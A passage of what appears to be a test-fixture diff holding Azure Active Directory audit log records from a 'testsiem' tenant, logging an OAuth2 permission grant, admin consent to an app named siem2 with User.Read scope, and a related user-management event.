"OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.0571467Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622817"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "db3ce560-1c2f-4c85-b305-55ad6476250f"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.0571467Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622817"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "db3ce560-1c2f-4c85-b305-55ad6476250f"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"NewValue": "", "OldValue": "", "Name": "ConsentContext.Tags"}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622848"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "24524679-8930-4afd-83b8-2dc70aa0a016"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"NewValue": "False", "OldValue": "", "Name": "ConsentContext.IsAppOnly"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622848"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "24524679-8930-4afd-83b8-2dc70aa0a016"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"NewValue": "False", "OldValue": "", "Name": "ConsentContext.IsAppOnly"}, {"NewValue": "True", "OldValue": "", "Name": "ConsentContext.OnBehalfOfAll"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622848"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "24524679-8930-4afd-83b8-2dc70aa0a016"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "User.ObjectID", "OldValue": "", "NewValue": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "User.UPN", "OldValue": "", "NewValue": "asr@testsiem.onmicrosoft.com"}, {"Name": "User.PUID", "OldValue": "", "NewValue": "1003200096971F55"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"User.ObjectID\",\"User.UPN\",\"User.PUID\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"ObjectClass\":\"User\",\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"PUID\":\"1003200096971F55\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": 